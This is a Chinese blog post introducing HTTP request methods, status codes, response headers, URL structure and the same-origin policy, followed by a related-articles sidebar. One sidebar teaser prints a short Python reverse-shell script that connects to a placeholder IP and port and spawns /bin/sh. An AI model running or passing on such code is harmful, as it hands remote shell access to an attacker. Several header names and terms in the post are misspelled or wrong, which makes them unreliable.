HTTP协议初识

最新推荐文章于 2021-09-16 20:12:15 发布
最新推荐文章于 2021-09-16 20:12:15 发布
阅读量147 收藏
点赞数
分类专栏: hack 文章标签: http
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kangzinian/article/details/107072949
版权

HTTP请求方式

HTTP1.0的请求方法

  • HTTP1.0三种请求方式,GET,POST和HEAD
  • 掌握GET请求的标准格式
  • 掌握POST请求提交表单,上传文件的方法
  • 了解HEAD请求与GET请求的区别

HTTP1.1新增的请求方法

  • 了解HTTP1.1新增的五种请求方法:OPTIONS,PUT,DELETE,TRACE,CONNECT方法的基本概念
  • 掌握HTTP1.1新增的五种请求的基本方法和产生的请求结果

HTTP请求由三部分组成,分别是:请求行、消息报头、请求正文

请求行以一个方法符号开头,空格分开,后面跟着请求的URL和协议的版本,格式如下:

  • Method Request-URL HTTP-Version(CR)(LF)
  • 其中Method表示请求方法(get、post、head)
  • Request-URL是一个统一资源标识符
  • HTTP-Version表示请求的HTTP协议版本
  • (CR)(LF)表示回车和换行
  • 例:GET/get.php?arg1=value1 HTTP/1.1

HTTP请求-POST

  • post请求是包含数据
  • 情书数据的格式:
    • 表单格式:application/x-www-form-yrkebcoded
    • 混合模式:multipart/form-data
    • JSON格式:application/json
    • XML格式:text/xml
    • 文本:text/plain
  • 表单格式:
    • 与get方式类似,将所有提交数据放在数据区域

HTTP状态码

类型已定义范围分类
1XX100-101信息提示
2XX200-206成功
3XX300-307重定向
4XX400-417客户端错误
5XX500-505服务端错误

常用标准相应头字段

Access:服务器支持哪些请求方法(如GET、POST等)。

Content-Encodeing:文档的编码(Encode)方法。

Content-Length:表示内容长度。

Content-Type:表示后面的文档属于什么MIME类型。

Date:当前的GMT时间。

Expires:应该在什么时候认为文档已经过期,从而不再缓存它。

Last-Modified:文档的最后改动时间。

Location:表示客户应当到哪里去提取文档。

Refresh:表示浏览器应该在多少时间后刷新文档,以秒计。

Server:服务器名字

Set-Cookie:设置和页面关联的Cookie

WWW-Authenticate:标识访问请求实体的身份验证方案。

参考文档:http://www.jianshu.com/p/6e86903d74f7

返回头尽量不要返回后端的服务版本(nginx或apche版本)
不要显示后端开发语言版本

HTTP协议的URL

URL是统一资源资源符,是互联网上标准的资源的地址

URL包含:

  • 协议
  • 用户名:密码
  • 主机-子域名.域名.顶级域名(或IP)
  • 端口号
  • 目录。文件名.文件后缀
  • 参数=值
  • 标志

格式:

  • 协议://用户名:密码@子域名.域名.顶级域名:端口号/目录/文件名.文件后缀?参数=值#标志

URL同源策略

URL格式中,协议,主机,端口三部分相同,才算同源

浏览器设置中,默认情况下只有同源的内容才能相互操作。

同源的才能通过JavaScript访问对方的内容

圣默
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
初识HTTP协议 HTTP协议是什么
11-23
一、HTTP协议是什么 二、HTTP是怎样工作的
HTTP协议理解——计算机网络
宝藏女孩的成长日记
05-09 1163
http一、概念二、特点三、工作原理四、URL4.1定义4.2语法:五、状态码5.1http常见状态码:5.2状态码分类:5.3常用端口号: 一、概念 1.http(超文本传输协议)是一种用于从WWW服务器传输超文本到本地浏览器的传输协议。 2.涉及两个对象:服务端和客户端。 3.采用请求/应答方式:客户端请求服务,服务端为客户端提供服务,服务端随时准备被客户端请求。 二、特点 1.支持客户/服务器模式。 2.简单快速:客户向服务器请求服务时,只需传送请求方法和路径。请求方法常用的有GET、POST、HEA
HTTP协议和URLConnection使用
Charge8的博客
08-17 905
一、HTTP协议简介 HTTP协议是Hyper Text Transfer Protocol(超文本传输协议)的缩写,它是一种用于分布式、协作式和web应用系统的应用层协议HTTP的发展是由蒂姆·伯纳斯-李于1989年在欧洲核子研究组织(CERN)所发起。 HTTP的标准制定由万维网协会(World Wide Web Consortium,W3C)和互联网工程任务组(Internet Engineering Task Force,IETF)进行协调,最终发布了一系列的RFC,其中最著名的是1999
网络基础2——浅谈HTTP协议
LSMSMD0526的博客
05-17 346
我们都知道,在网络中为了便于操作和维护,我们将网络进行了分层。TCP/IP协议将网络分成了五层,自顶向下分别是应用层、传输层、网络层、数据链路层、物理层(通常是四层,物理层考虑较少)。在每一层中都有与之对应的网络协议,此篇介绍应用层最重要的一个协议HTTP协议…… 先了解一下URL URL,全称Uniform Resource Locator,统一资源定位符,就是我们平时俗称的“网址”,是互联网上...
URL构成及各个协议默认端口
代码海中一粒米
10-23 3787
协议://域名端口号/目录/文件名参数 #锚点 1.协议部分:该URL的协议部分为“http:”,这代表网页使用的是HTTP协议。 2.域名部分:该URL的域名部分为“www.baidu.com”。也可以使用IP地址作为域名使用 3.端口部分:跟在域名后面的是端口,域名和端口之间使用“:”作为分隔符。非必备,若省略端口部分,将采用默认端口 4.虚拟目录部分:从域名后的第一个“/”开始到最后一个“/”为止,是虚拟目录部分。非必备 5.文件名部分:从域名后的最后一个“/”开始到“?”为止,是文件名部分,如果
URL的组成部分
zhuxuerong的博客
12-02 878
构造一个完整的URL例子: http://www.godsince.com:8080/news/index.asp?boardID=5&ID=24618&page=1#r_70732412 一个完整的URL包括:协议部分域名部分、端口部分、虚拟目录部分文件名部分参数部分、锚部分协议:模式/协议(scheme),该URL的协议部分http:,在Internet中可使用...
AJAX初级教程之初识AJAX
01-19
从刚刚接触B/S开发,就耳闻AJAX技术,但一直处于模棱两可的状态,大道理明白,一到动手就傻眼了。 AJAX仿佛就是深不可测的技术,成为B/S学习过程中的一个阴影。...l 熟悉HTTP协议。 l 熟悉javascript。 l
AndroidVolley完全解析(一),初识Volley的基本用法
03-03
我们平时在开发Android应用的时候不可避免地都需要用到网络技术,而多数情况下应用程序都会使用HTTP协议来发送和接收网络数据。Android系统中主要提供了两种方式来进行HTTP通信,HttpURLConnection和HttpClient,...
Fiddler抓包工具基础学习视频.zip
05-09
04-Fiddler系列课--HTTP协议概述 05-Fiddler系列课-HTTP协议请求报文详解 06-Fiddler系列课-HTTP协议响应报文详解 07Fiddler安装 08Fiddler菜单栏 09Fiddler工具栏-重放请求和移除请求 10Fiddler工具栏-2 11Session ...
03、Web服务器通信原理
WX公众号-小白学安全
03-31 221
HTTP请求 http请求由三部分组成:请求行、消息报头、请求正文。 请求行以一个方法符号开头,以空格分开,后面跟着请求的URI和协议的版本 Cookie:通过再客户端记录信息确定用户身份 Keep-alive:在一次TCP连接中可以持续发送多份数据而不会断开连接,早期http请求发起一次tcp连接 状态码 状态码作用:WEB服务器用来告诉客户端,发生了什么 状态码 已定义范围 分类 1XX 100-101 信息提示 2XX 200-206 请求成功200、201 3XX 300-3
十大应用安全威胁
kangzinian的博客
12-17 2773
常见应用安全威胁(OWASP TOP 10) 2013 注入 失效的身份认证和会话管理 跨站脚本攻击(XSS) 不安全的直接对象引用 安全配置错误 敏感信息泄露 功能级访问控制缺失 跨站请求伪造(CSRF) 使用含有已知漏洞的组件 未验证的重定向和转发 风险评估标准 风险 = 可能性 * 影响 颜色越深,说明越容易发生,影响越大 注入 SQL注...
MS03-026
kangzinian的博客
09-16 2133
靶场简介 Windows系统漏洞靶场1 靶场知识点 信息获取,缓冲区溢出,Metasploit攻击 靶场描述 靶场知识点 漏洞名称:MS03-026 漏洞介绍:Microsoft Windows DCOM RPC接口长主机名远程缓冲区溢出漏洞。 此漏洞最初由lsd-pl.net漏洞研究组在2003年7月16日发现的。这个漏洞被披露以后,随着exploit程序的公开,网上迅速出现了大量的exploit攻击实例,随后利用者个漏洞的蠕虫程序也大量出现,带来了巨大的危害。可以说这是个非常严重的漏洞,影响客户非常广泛
安装kali出现中文乱码的解决办法
kangzinian的博客
01-15 1915
众所周知,很多东西对中文都是相当的不友好,当咱们中国的小伙伴安装了Kali虚拟机选择中文的时候 就出现了难以忍受的乱码,这个十分令人头疼。 可以看到 中文字符都变成了方块乱码。 别急 我在整理了网上很多资料后,解决了这个问题 下面就给小伙伴们看一看 记不住的 可以收藏的哦 输入locale -a 查看是否有en_US.UTF-8和zh_CN.UTF-8, 在命令行输入dpkg-reco...
谷歌常见语法解析
kangzinian的博客
04-12 864
搜素引擎实际上就是一个爬取url的爬虫 搜素引擎就是帮助我们获取信息 对方的个人资料 公司信息 学校简介 数据文件 … 谷歌语法: 关键字 功能 “” 双引号内的内容不可拆分 site 指定域名 inurl url存在关键字的网页 intext 网页正文中的关键字 filetype 指定文件类型 intitle 网页标题中的关键字 link Link:z...
域名探测
kangzinian的博客
04-14 819
信息收集对于渗透测试前期来说是非常重要,对于目标站点较为安全的时候我们往往选择寻找子域名进行渗透测试 子域名的形式: zkaq.org 顶级域名(一级) a.zkaq.org 二级域名 b.a.zkaq.org 三级域名 通过点的个数来判断是几级域名 DNS解析就是通过dns服务器把域名解析为IP 子域名的子域名:我们可以把子域名下的站点当成一个独立的站带你,但是可能防止同一台服务器上 当...
Web漏洞扫描器-AWVS
kangzinian的博客
04-21 522
Web漏洞扫描工具 一、Web漏洞扫描工具 一、漏洞扫描 漏洞扫描是指基于漏洞数据库,通过扫描等手段对指定的远程或者本地计算机系统的安全脆弱性进行检测,发现课利用楼梯的一种安全检测(渗透挂机)行为。 二、WEB漏洞扫描器 针对于Web应用程序所开发的漏洞扫描器,例如SQL注入、XSS跨站脚本攻击等常见漏洞,进行自动式扫描探测是否存在漏洞。 二、安装Linux AWVS 移动文件到kali 分配权...
端口探测,发现脆弱站点
kangzinian的博客
04-18 273
Nmap端口扫描 1. 端口扫描的作用 Nmap(“网络映射器”)是免费开放源代码(许可证)实用程序,用于网络发现和安全审核。许多系统和网络管理员还发现它对于诸如网络清单,管理服务升级计划以及监视主机或服务正常运行时间之类的任务很有用。Nmap以新颖的方式使用原始IP数据包来确定网络上可用的主机,这些主机提供的服务(应用程序名称和版本),它们正在运行的操作系统(和OS版本),包过滤器/防火墙的类型...
一个常见反弹shell脚本详解
kangzinian的博客
09-16 95
# !/usr/bin/python import os, subprocess,socket s = socket.socekt(socket.AF_INET,scoket.SOCK_STREAM) s.connect("IP","port") os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p = sunprocess.call(["/bin/sh","-i"]) fileno() 方法返回一个整型的文件描述符(
Unity Tcp协议Http协议的差别
最新发布
07-28
回答: Unity Tcp协议Http协议有一些差别。首先,Tcp协议是一种面向连接的协议,而Http协议是一种无连接的协议。这意味着在使用Tcp协议时,需要先建立一个连接,然后才能进行数据传输,而Http协议则不需要建立连接...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值